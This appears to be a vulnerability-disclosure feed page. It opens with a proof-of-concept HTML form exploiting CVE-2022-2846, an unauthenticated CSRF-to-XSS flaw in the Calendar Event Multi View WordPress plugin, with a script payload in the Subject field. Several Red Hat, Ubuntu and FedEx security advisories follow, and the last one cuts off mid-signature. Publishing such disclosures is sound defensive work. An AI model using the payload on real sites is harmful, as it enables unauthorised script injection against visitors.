Calendar Event Multi View version 1.4.07 suffers from a cross site scripting vulnerability.

    # Exploit Title: Calendar Event Multi View  1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)# Date: 2022-05-25# Exploit Author: Mostafa Farzaneh# WPScan page:https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/# Software Link:https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip# Version:   1.4.06# Tested on: Linux# CVE : CVE-2022-2846# Description:The Calendar Event Multi View WordPress plugin before 1.4.07 does not haveany authorisation and CSRF checks in place when creating an event, and isalso lacking sanitisation as well as escaping in some of the event fields.This could allow unauthenticated attackers to create arbitrary events andput Cross-Site Scripting payloads in it.#POC and exploit code:As an unauthenticated user, to add a malicious event (on October 6th, 2022)to the calendar with ID 1, open the code below<html>  <body>    <form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"method="POST">      <input type="hidden" name="Subject"value='"><script>alert(/XSS/)</script>' />      <input type="hidden" name="colorvalue" value="#f00" />      <input type="hidden" name="rrule" value="" />      <input type="hidden" name="rruleType" value="" />      <input type="hidden" name="stpartdate" value="10/6/2022" />      <input type="hidden" name="stparttime" value="00:00" />      <input type="hidden" name="etpartdate" value="10/6/2022" />      <input type="hidden" name="etparttime" value="00:00" />      <input type="hidden" name="stpartdatelast" value="10/6/2022" />      <input type="hidden" name="etpartdatelast" value="10/6/2022" />      <input type="hidden" name="stparttimelast" value="" />      <input type="hidden" name="etparttimelast" value="" />      <input type="hidden" name="IsAllDayEvent" value="1" />      <input type="hidden" name="Location" value="CSRF" />      <input type="hidden" name="Description" value='<p style="text-align:left;">CSRF</p>' />      <input type="hidden" name="timezone" value="4.5" />      <input type="submit" value="Submit request" />    </form>  </body></html>The XSS will be triggered when viewing the related event

Calendar Event Multi View 1.4.07 Cross Site Scripting

Red Hat Security Advisory 2023-1597-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: httpd:2.4 security update  
Advisory ID:       RHSA-2023:1597-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1597  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-25690   
=====================================================================

1. Summary:

An update for the httpd:2.4 module is now available for Red Hat Enterprise  
Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: HTTP request splitting with mod_rewrite and mod_proxy  
(CVE-2023-25690)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176209 - CVE-2023-25690 httpd: HTTP request splitting with mod_rewrite and mod_proxy

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
httpd-2.4.37-47.module+el8.6.0+18507+843660a1.4.src.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.src.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.src.rpm

aarch64:  
httpd-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.aarch64.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.aarch64.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.aarch64.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.aarch64.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_session-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.aarch64.rpm

noarch:  
httpd-filesystem-2.4.37-47.module+el8.6.0+18507+843660a1.4.noarch.rpm  
httpd-manual-2.4.37-47.module+el8.6.0+18507+843660a1.4.noarch.rpm

ppc64le:  
httpd-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.ppc64le.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.ppc64le.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.ppc64le.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.ppc64le.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_session-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.ppc64le.rpm

s390x:  
httpd-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.s390x.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.s390x.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.s390x.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.s390x.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_session-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.s390x.rpm

x86_64:  
httpd-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
httpd-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
httpd-debugsource-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
httpd-devel-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
httpd-tools-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
httpd-tools-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_http2-1.15.7-5.module+el8.6.0+18506+34b194fb.2.x86_64.rpm  
mod_http2-debuginfo-1.15.7-5.module+el8.6.0+18506+34b194fb.2.x86_64.rpm  
mod_http2-debugsource-1.15.7-5.module+el8.6.0+18506+34b194fb.2.x86_64.rpm  
mod_ldap-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_ldap-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_md-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_md-debuginfo-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_md-debugsource-2.0.8-8.module+el8.3.0+6814+67d1e611.x86_64.rpm  
mod_proxy_html-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_session-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_session-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_ssl-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm  
mod_ssl-debuginfo-2.4.37-47.module+el8.6.0+18507+843660a1.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25690  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCw/ItzjgjWX9erEAQhMag//dova9BZiJO/mz0LVTMW0eVp3tMsSayX6  
fCuTlL0U2LOYllp4ijrcAlxnTIxBLw1NCfqEgLMU3Yl5l/hfuSGItA2qnhIfHbla  
Dplqpqa3GWAhAbZzrkNTOgusJ8virsaAlCTx9H+aw4uhp8xQiAt4LyGfdu4RC+cy  
jMa7UQbPCXRf9eG6jHnpjM4AxZV6gug1x8jR8OID7JwV+BcBqQjRVxVel4emmp0a  
71cK1sveJMjJUs7WttZ182vG6tk28l/mUJiOvesuSHKj4qEGNAVV61rDeuo7WwLn  
x5B0eVqEtmwM92vLyODd/YpctmRFtQhiUxkkklhOR3CRW24EKWXJltslq3UJ8FiM  
BLwqsfDxHMPUlAjOo/Z7TkJVXHCLF/BmjjeaNr5mnvB1RO74LELJM8vU4uZ3hdGA  
4/CHSD8xQwCzJxqMb6NpTyMblQICf0njcR5ccsQggqb/LGL6DLXTsIEgSPbS1YmZ  
rFr+ZuMhaISn/LJ8M/I/ELpdJpX6kDgisV/BpsqUwxZT5/VhBtFhVw7OcON8hrnY  
8OQ++i4QLZv+70v+fQ1lilFTBNdcqqu4rgmC5NW1BDcyL2uKuEBA/0MJoq2L50zv  
OWEl7V/lRUGkMEHOYFVYS4fwORAuYyc2rFc/+Rfco6iARROYEZ6mQQYLxaOG36EU  
WWRX4KTkgrM=  
=2Owu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1597-01

FedEx Ship Manager (FSM) version 3704 suffers from an insecure use of .NET remoting.

Change Mirror Download

    Vulnerable Software Download URL:https://www.fedex.com/en-us/shipping/ship-manager/software.html#tab-4FSM 3704 (and some earlier versions) use .NET Remoting in a way that canlead to unauthenticated remote code execution attacks as SYSTEM. Tools thatcan successfully attack affected services are freely available.Administrators should block or otherwise limit access to TCP ports openedby services installed by this software wherever possible.

FedEx Ship Manager (FSM) 3704 Insecure .NET Remoting

Ubuntu Security Notice 5995-1 - It was discovered that Vim incorrectly handled memory when opening certain files. If an attacker could trick a user into opening a specially crafted file, it could cause Vim to crash, or possible execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    =========================================================================Ubuntu Security Notice USN-5995-1April 04, 2023vim vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Vim.Software Description:- vim: Vi IMproved - enhanced vi editorDetails:It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS,and Ubuntu 22.04 LTS. (CVE-2022-0413, CVE-2022-1629, CVE-2022-1674,CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796, CVE-2022-1851,CVE-2022-1898, CVE-2022-1942, CVE-2022-1968, CVE-2022-2124, CVE-2022-2125,CVE-2022-2126, CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,CVE-2022-2304, CVE-2022-2345, CVE-2022-2581)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04LTS. (CVE-2022-1720, CVE-2022-2571, CVE-2022-2845, CVE-2022-2849,CVE-2022-2923)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2022-1927,CVE-2022-2344)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, Ubuntu 22.04 LTS,and Ubuntu 22.10. (CVE-2022-2946)It was discovered that Vim incorrectly handled memory when opening certainfiles. If an attacker could trick a user into opening a specially craftedfile, it could cause Vim to crash, or possible execute arbitrary code. Thisissue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10.(CVE-2022-2980)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  vim                             2:9.0.0242-1ubuntu1.3  vim-athena                      2:9.0.0242-1ubuntu1.3  vim-gtk3                        2:9.0.0242-1ubuntu1.3  vim-motif                       2:9.0.0242-1ubuntu1.3  vim-nox                         2:9.0.0242-1ubuntu1.3  vim-tiny                        2:9.0.0242-1ubuntu1.3Ubuntu 22.04 LTS:  vim                             2:8.2.3995-1ubuntu2.5  vim-athena                      2:8.2.3995-1ubuntu2.5  vim-gtk                         2:8.2.3995-1ubuntu2.5  vim-gtk3                        2:8.2.3995-1ubuntu2.5  vim-nox                         2:8.2.3995-1ubuntu2.5  vim-tiny                        2:8.2.3995-1ubuntu2.5Ubuntu 20.04 LTS:  vim                             2:8.1.2269-1ubuntu5.13  vim-athena                      2:8.1.2269-1ubuntu5.13  vim-gtk                         2:8.1.2269-1ubuntu5.13  vim-gtk3                        2:8.1.2269-1ubuntu5.13  vim-nox                         2:8.1.2269-1ubuntu5.13  vim-tiny                        2:8.1.2269-1ubuntu5.13Ubuntu 18.04 LTS:  vim                             2:8.0.1453-1ubuntu1.12  vim-athena                      2:8.0.1453-1ubuntu1.12  vim-gnome                       2:8.0.1453-1ubuntu1.12  vim-gtk                         2:8.0.1453-1ubuntu1.12  vim-gtk3                        2:8.0.1453-1ubuntu1.12  vim-nox                         2:8.0.1453-1ubuntu1.12  vim-tiny                        2:8.0.1453-1ubuntu1.12Ubuntu 14.04 ESM:  vim                             2:7.4.052-1ubuntu3.1+esm8  vim-athena                      2:7.4.052-1ubuntu3.1+esm8  vim-gnome                       2:7.4.052-1ubuntu3.1+esm8  vim-gtk                         2:7.4.052-1ubuntu3.1+esm8  vim-nox                         2:7.4.052-1ubuntu3.1+esm8  vim-tiny                        2:7.4.052-1ubuntu3.1+esm8In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5995-1  CVE-2022-0413, CVE-2022-1629, CVE-2022-1674, CVE-2022-1720,  CVE-2022-1733, CVE-2022-1735, CVE-2022-1785, CVE-2022-1796,  CVE-2022-1851, CVE-2022-1898, CVE-2022-1927, CVE-2022-1942,  CVE-2022-1968, CVE-2022-2124, CVE-2022-2125, CVE-2022-2126,  CVE-2022-2129, CVE-2022-2175, CVE-2022-2183, CVE-2022-2206,  CVE-2022-2304, CVE-2022-2344, CVE-2022-2345, CVE-2022-2571,  CVE-2022-2581, CVE-2022-2845, CVE-2022-2849, CVE-2022-2923,  CVE-2022-2946, CVE-2022-2980Package Information:  https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.3  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.5  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.13  https://launchpad.net/ubuntu/+source/vim/2:8.0.1453-1ubuntu1.12

Ubuntu Security Notice USN-5995-1

Red Hat Security Advisory 2023-1559-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a use-after-free vulnerability.

Red Hat Security Advisory 2023-1559-01

Red Hat Security Advisory 2023-1588-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:1588-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1588  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-0266  
====================================================================  
1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
kernel-4.18.0-147.81.1.el8_1.src.rpm

aarch64:  
bpftool-4.18.0-147.81.1.el8_1.aarch64.rpm  
bpftool-debuginfo-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-core-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-cross-headers-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debug-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debug-core-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debug-devel-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debug-modules-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debuginfo-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-devel-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-headers-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-modules-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-modules-extra-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-tools-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-147.81.1.el8_1.aarch64.rpm  
kernel-tools-libs-4.18.0-147.81.1.el8_1.aarch64.rpm  
perf-4.18.0-147.81.1.el8_1.aarch64.rpm  
perf-debuginfo-4.18.0-147.81.1.el8_1.aarch64.rpm  
python3-perf-4.18.0-147.81.1.el8_1.aarch64.rpm  
python3-perf-debuginfo-4.18.0-147.81.1.el8_1.aarch64.rpm

noarch:  
kernel-abi-whitelists-4.18.0-147.81.1.el8_1.noarch.rpm  
kernel-doc-4.18.0-147.81.1.el8_1.noarch.rpm

ppc64le:  
bpftool-4.18.0-147.81.1.el8_1.ppc64le.rpm  
bpftool-debuginfo-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-core-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-cross-headers-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debug-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debug-core-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debug-devel-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debug-modules-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debuginfo-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-devel-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-headers-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-modules-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-modules-extra-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-tools-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-147.81.1.el8_1.ppc64le.rpm  
kernel-tools-libs-4.18.0-147.81.1.el8_1.ppc64le.rpm  
perf-4.18.0-147.81.1.el8_1.ppc64le.rpm  
perf-debuginfo-4.18.0-147.81.1.el8_1.ppc64le.rpm  
python3-perf-4.18.0-147.81.1.el8_1.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-147.81.1.el8_1.ppc64le.rpm

s390x:  
bpftool-4.18.0-147.81.1.el8_1.s390x.rpm  
bpftool-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-core-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-cross-headers-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debug-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debug-core-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debug-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debug-devel-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debug-modules-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debug-modules-extra-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-devel-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-headers-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-modules-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-modules-extra-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-tools-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-tools-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-zfcpdump-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-zfcpdump-core-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-147.81.1.el8_1.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-147.81.1.el8_1.s390x.rpm  
perf-4.18.0-147.81.1.el8_1.s390x.rpm  
perf-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm  
python3-perf-4.18.0-147.81.1.el8_1.s390x.rpm  
python3-perf-debuginfo-4.18.0-147.81.1.el8_1.s390x.rpm

x86_64:  
bpftool-4.18.0-147.81.1.el8_1.x86_64.rpm  
bpftool-debuginfo-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-core-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-cross-headers-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debug-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debug-core-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debug-devel-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debug-modules-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debuginfo-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-devel-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-headers-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-modules-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-modules-extra-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-tools-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-147.81.1.el8_1.x86_64.rpm  
kernel-tools-libs-4.18.0-147.81.1.el8_1.x86_64.rpm  
perf-4.18.0-147.81.1.el8_1.x86_64.rpm  
perf-debuginfo-4.18.0-147.81.1.el8_1.x86_64.rpm  
python3-perf-4.18.0-147.81.1.el8_1.x86_64.rpm  
python3-perf-debuginfo-4.18.0-147.81.1.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCvqp9zjgjWX9erEAQiaXhAAg1lFw+m+yEwVdLTbaGOkzg0Wla/fIFT9  
KiLKyv/l8wHRKUHFkcyNXD35Ux2Ob+BFkEwR2CddOf+6ZJQz9cM9IroCQ4fgiNrp  
wlRWQYtKfq37HTUXP5Heiwqe7yw1eiZdZ/UuqoERReyreMdUjahKuP4w/UxG1+Pw  
/xyNL10Oz52Ws/qGyLAv4UB55b4h94FwNDhskvVkw9/hCk0qMJrcECDZn+YLoCg3  
VaN/MGl8uSRMf3DKnyw/Z/2v9AZd0X4AqKmzbNWUFyQ86bwaVSC37B/G5uQQZTSS  
XlnjwUgOLjg+SoxN7UrYcC3It+7UAx7Gbg5gezXXzCWjRXhn/Tqc9Y/+opMJC21X  
